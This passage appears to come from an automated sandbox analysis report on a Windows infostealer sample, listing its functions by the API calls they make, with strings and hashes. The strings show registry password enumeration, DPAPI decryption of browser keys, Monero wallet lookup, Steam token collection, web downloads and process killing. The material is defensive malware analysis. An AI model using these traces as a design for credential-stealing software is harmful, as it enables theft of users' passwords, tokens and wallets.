                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00426014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0042609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 004260D0
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: 248e388eb9716987a64bfdae4f7488f922a15a70e7c441f4d4e5e693b8a5128c
                          • Instruction ID: 23f54f40cff19bc4bb9c49db95a2febe0b18c2065056c6ff7ff83454884ea771
                          • Opcode Fuzzy Hash: 248e388eb9716987a64bfdae4f7488f922a15a70e7c441f4d4e5e693b8a5128c
                          • Instruction Fuzzy Hash: B261C030700520DBDB28CF5CEAC096EB3B6EF85304BA5495AE582C7381C734ED819B9D
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0041E07D
                          • lstrcat.KERNEL32(?,?), ref: 0041E098
                          • lstrcat.KERNEL32(?,?), ref: 0041E0AC
                          • lstrcat.KERNEL32(?,00FAB338), ref: 0041E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0041E0D4
                          • lstrcat.KERNEL32(?,00FBD588), ref: 0041E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0041E126
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 48df637f5adf256f89f33124bfa96c9134e1575a9771df776a95f89c303645bd
                          • Instruction ID: 501516eef5e6119cdaa8ef057f8ceb6b02008702d368781ef888722ec6d27aa0
                          • Opcode Fuzzy Hash: 48df637f5adf256f89f33124bfa96c9134e1575a9771df776a95f89c303645bd
                          • Instruction Fuzzy Hash: CD41D771E1011C9BCB25DB64DD486DE73B5BF48300F0049AAF90AA3291DFB89F858F94
                          APIs
                            • Part of subcall function 004077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                            • Part of subcall function 004077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                            • Part of subcall function 004077D0: StrStrA.SHLWAPI(?,Password), ref: 004078B8
                            • Part of subcall function 004077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                            • Part of subcall function 004077D0: HeapFree.KERNEL32(00000000), ref: 004078F3
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 00407A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00407ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00407ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00407AF0
                          • wsprintfA.USER32 ref: 00407B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00407B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00407B47
                          • lstrcat.KERNEL32(00000000,00434AD4), ref: 00407B60
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: 0e9693a24bed11132ccf272c91ee3e2d1e75641051f5d3aaf3441a98692b6c9b
                          • Instruction ID: 4a0270a12d15eba44ba155fce02676c7c42fa7ad0357aa4cf213092b6f362f58
                          • Opcode Fuzzy Hash: 0e9693a24bed11132ccf272c91ee3e2d1e75641051f5d3aaf3441a98692b6c9b
                          • Instruction Fuzzy Hash: CA319572E04214AFCB14DB64DC449ABB77AEB88704F14552EF605A3390DB78F941CBA5
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0041820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418243
                          • lstrlen.KERNEL32(00000000), ref: 00418260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418297
                          • lstrlen.KERNEL32(00000000), ref: 004182B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004182EB
                          • lstrlen.KERNEL32(00000000), ref: 00418308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418337
                          • lstrlen.KERNEL32(00000000), ref: 00418351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00418380
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 9a0a668d4ffc206761009af268696d54ba45bb04eb8617637b620cd5376e1d80
                          • Instruction ID: 5529c5f78c625342dc980c30c67e31fec9b4df9f7308107f545db0c079820e43
                          • Opcode Fuzzy Hash: 9a0a668d4ffc206761009af268696d54ba45bb04eb8617637b620cd5376e1d80
                          • Instruction Fuzzy Hash: 7151AF71A006069FDB10DF39D958AABB7A4EF00740F14452AAD16EB384DF78ED90CBE4
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                          • StrStrA.SHLWAPI(?,Password), ref: 004078B8
                            • Part of subcall function 00407750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                            • Part of subcall function 00407750: RtlAllocateHeap.NTDLL(00000000), ref: 00407765
                            • Part of subcall function 00407750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                            • Part of subcall function 00407750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                            • Part of subcall function 00407750: LocalFree.KERNEL32(?), ref: 004077B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                          • HeapFree.KERNEL32(00000000), ref: 004078F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407A35
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: 3cf325d79a33fb09ef097e4edaf5e7818a90b8d9ff6e4902b4fbaaa44bd21b81
                          • Instruction ID: 851ed36c2908793e5c394c9a592e4404168f92a7ab381124a98ace949238a758
                          • Opcode Fuzzy Hash: 3cf325d79a33fb09ef097e4edaf5e7818a90b8d9ff6e4902b4fbaaa44bd21b81
                          • Instruction Fuzzy Hash: 89712EB1D0021DEBDB10DF95DC80ADEB7B9EF49300F10456AE609B7240EB756A89CFA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0040113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                          • RegCloseKey.ADVAPI32(?), ref: 0040117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0040114F
                          • wallet_path, xrefs: 0040116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 6d01a78dd2703cc8c80cfc44e62c956613e7042535cbaa24fe8283e197e708bc
                          • Instruction ID: 383e7467a56373d6d0d7d4512f8a3326ad796bb69a11dfcae5090baa37e7c7c5
                          • Opcode Fuzzy Hash: 6d01a78dd2703cc8c80cfc44e62c956613e7042535cbaa24fe8283e197e708bc
                          • Instruction Fuzzy Hash: 23F06D75A40308BFD7049BA09C8DFEA7B7DEB04755F100059BE05E2290EAB05A448BE0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00409E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00409E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00409EA7
                            • Part of subcall function 004271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 004271FE
                          • lstrcpy.KERNEL32(00000000,00434C48), ref: 00409FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: b792278274e77446f0b5aa8e1a9ca83b91a2c69d73382fa436c475225909a066
                          • Instruction ID: e7189ebb8ea779bb62c76878cc913784305d8d18a868e4b117b5cd877531c5f0
                          • Opcode Fuzzy Hash: b792278274e77446f0b5aa8e1a9ca83b91a2c69d73382fa436c475225909a066
                          • Instruction Fuzzy Hash: 5451BF31B102099BDB10EF69DC45B9E77A4AF40318F15503AF909FB2D2DBB8ED058B98
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00405661
                          • InternetOpenA.WININET(0042CFEC,00000000,00000000,00000000,00000000), ref: 00405677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00405692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004056BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 004056E1
                          • InternetCloseHandle.WININET(?), ref: 004056FA
                          • InternetCloseHandle.WININET(00000000), ref: 00405701
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 56991fbfa8ff731cefd4789a31361217da942f2a87cf7d2a2611e9ffcee565a7
                          • Instruction ID: 497886bade507dc047050612015881185fcc427d3ee3b68b24892f00a211d5cf
                          • Opcode Fuzzy Hash: 56991fbfa8ff731cefd4789a31361217da942f2a87cf7d2a2611e9ffcee565a7
                          • Instruction Fuzzy Hash: 2E415C70A00605AFDB14CF54DD88F9BB7B5FF48304F14806AE909AB391D7759941CFA8
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00424759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00424769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0042477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0042479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 004247AB
                          • CloseHandle.KERNEL32(00000000), ref: 004247B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 004247C0
                          • CloseHandle.KERNEL32(00000000), ref: 004247CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                          • Instruction ID: 2796138e49d57b0afb57703697c4648b669f32e79a409fcda75587c3eb52ce3c
                          • Opcode Fuzzy Hash: 52672e04caeec890ace4a1d791050bff1080cdcf40c9c1db2d30368871fa3206
                          • Instruction Fuzzy Hash: 3E019271601224AFE7215B70ACC9FEB77BDEB88791F401189F90592290EFB48D808AA4
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00418435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041846C
                          • lstrlen.KERNEL32(00000000), ref: 004184B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004184E9
                          • lstrlen.KERNEL32(00000000), ref: 004184FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041852E
                          • StrCmpCA.SHLWAPI(00000000,00434C3C), ref: 0041853E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 8150c0be56da93f1ae30d5dcf51d92bd68bbe0f7923c85136ff01eeaecae8e4e
                          • Instruction ID: 78e6861f8760121f1f85c03bd3cb1e2b351bada1f484352ddec1a083a3ca406f
                          • Opcode Fuzzy Hash: 8150c0be56da93f1ae30d5dcf51d92bd68bbe0f7923c85136ff01eeaecae8e4e
                          • Instruction Fuzzy Hash: 2D5180716002069FCB24DF69D984A9BB7F6EF44344F24845EEC45EB345EF38E9818B94
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042292C
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,004228A9), ref: 0042294B
                          • RegQueryValueExA.ADVAPI32(004228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422965
                          • RegCloseKey.ADVAPI32(004228A9), ref: 0042296F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: 5364e14c0a3d05156664c7df2c62bb00f5e878ba2183d47dff6cc4ea0b38e43d
                          • Instruction ID: c5fe118d464dd8edc36b27dd1f265e731215acc2a0e12dade4fb376ba34b0d4d
                          • Opcode Fuzzy Hash: 5364e14c0a3d05156664c7df2c62bb00f5e878ba2183d47dff6cc4ea0b38e43d
                          • Instruction Fuzzy Hash: 1501B175600329BFD314CBA0AC59EFB7BBDEB48755F100059FE4597240EAB159448BE0
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0042289C
                            • Part of subcall function 00422910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00422925
                            • Part of subcall function 00422910: RtlAllocateHeap.NTDLL(00000000), ref: 0042292C
                            • Part of subcall function 00422910: RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,004228A9), ref: 0042294B
                            • Part of subcall function 00422910: RegQueryValueExA.ADVAPI32(004228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00422965
                            • Part of subcall function 00422910: RegCloseKey.ADVAPI32(004228A9), ref: 0042296F
                          • RegOpenKeyExA.ADVAPI32(80000002,00FABCB0,00000000,00020119,00419500), ref: 004228D1
                          • RegQueryValueExA.ADVAPI32(00419500,00FBDE28,00000000,00000000,00000000,000000FF), ref: 004228EC
                          • RegCloseKey.ADVAPI32(00419500), ref: 004228F6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 6afc374b1021e13fac2369d4108616fa2db62d40761026aa18e21b5f00d63e66
                          • Instruction ID: b838523736346adb7ce8e3c82dd77743de362bd687d96efd208b95ca381da15e
                          • Opcode Fuzzy Hash: 6afc374b1021e13fac2369d4108616fa2db62d40761026aa18e21b5f00d63e66
                          • Instruction Fuzzy Hash: B301A271B00318BFD714ABA4AD49FEA777EEB44315F000159FE09D3250DAB499448BE0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0040723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00407279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00407280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 004072C3
                          • HeapFree.KERNEL32(00000000), ref: 004072CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00407329
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: ed1be72cb97006b6cfa7eec419b7bbe96971c02547229239504ae9556a509935
                          • Instruction ID: 27169f5df709d88f62061863ce62bc47ac52a8987bb1457c2f2a5aa34c0093c8
                          • Opcode Fuzzy Hash: ed1be72cb97006b6cfa7eec419b7bbe96971c02547229239504ae9556a509935
                          • Instruction Fuzzy Hash: 4E416B71B046059BEB20CF69DC84BAAB3E9BB84305F1445BAEC49D7380E635F900DA65
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 00409CA8
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409CDA
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D03
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocLocallstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2746078483-738592651
                          • Opcode ID: 8fd2bcfc67d25209425241227c813c0e4ef18065d64adf87ac0d9fb9c51ec3f9
                          • Instruction ID: ad9cec8cc1c90d85c3ad67c9ce925e1efb107697941990958aebc0490f667acb
                          • Opcode Fuzzy Hash: 8fd2bcfc67d25209425241227c813c0e4ef18065d64adf87ac0d9fb9c51ec3f9
                          • Instruction Fuzzy Hash: 2A419D31B0020A9BDB21EF69D9456AF77B4AF54308F04447AED15B73E3DA78AD04CB98
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041EA24
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041EA53
                          • lstrcat.KERNEL32(?,00000000), ref: 0041EA61
                          • lstrcat.KERNEL32(?,00431794), ref: 0041EA7A
                          • lstrcat.KERNEL32(?,00FB8AE0), ref: 0041EA8D
                          • lstrcat.KERNEL32(?,00431794), ref: 0041EA9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: 24efa4d62bf1b18e58e6653d9f447b2f22108c514c91e68fd26aaca9e1d00bc0
                          • Instruction ID: 7c7973f30af5ec6e024af78e735b51de974a09fd347e59ab0f9f73f2c21397d0
                          • Opcode Fuzzy Hash: 24efa4d62bf1b18e58e6653d9f447b2f22108c514c91e68fd26aaca9e1d00bc0
                          • Instruction Fuzzy Hash: EC418571B10118ABCB15EB64DD45EED7379BF48300F0054ADBA16A72D0DFB49E848FA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041ECDF
                          • lstrlen.KERNEL32(00000000), ref: 0041ECF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041ED1D
                          • lstrlen.KERNEL32(00000000), ref: 0041ED24
                          • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0041ED52
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID: steam_tokens.txt
                          • API String ID: 367037083-401951677
                          • Opcode ID: 1aa12a3fc33ac51e83087fb66b9ed763023bd6fc2a8d315f7fe8c24c01f0fb3d
                          • Instruction ID: 5e4229333b3134b13e4a8b7bae4d7063a41ac74a7d65ada3b7cea2f777646fb4
                          • Opcode Fuzzy Hash: 1aa12a3fc33ac51e83087fb66b9ed763023bd6fc2a8d315f7fe8c24c01f0fb3d
                          • Instruction Fuzzy Hash: 63318D31B105155BC722BB7AEE4A99F77A5AF40304F04103AB805EB2D2DE7CDC498BD9
                          APIs
                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,0040140E), ref: 00409A9A
                          • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,0040140E), ref: 00409AB0
                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,0040140E), ref: 00409AC7
                          • ReadFile.KERNEL32(00000000,00000000,?,0040140E,00000000,?,?,?,0040140E), ref: 00409AE0
                          • LocalFree.KERNEL32(?,?,?,?,0040140E), ref: 00409B00
                          • CloseHandle.KERNEL32(00000000,?,?,?,0040140E), ref: 00409B07
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 2311089104-0
                          • Opcode ID: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                          • Instruction ID: e07bc1cf37077e01f74a08ddf4965744106ae1532c602a75826c3d4cb70f4bb0
                          • Opcode Fuzzy Hash: 18fe08c416d9db512f6576e54d93a0197b66446ba9587125c2374a8c0eafa297
                          • Instruction Fuzzy Hash: 97115E71600209AFE710DFA9DDC8AAB737DFB44350F10016AF901A72C1EB74AD50CBA4
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00425B14
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A188
                            • Part of subcall function 0042A173: std::exception::exception.LIBCMT ref: 0042A1AE
                          • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 00425B7C
                          • memmove.MSVCRT(00000000,?,?), ref: 00425B89
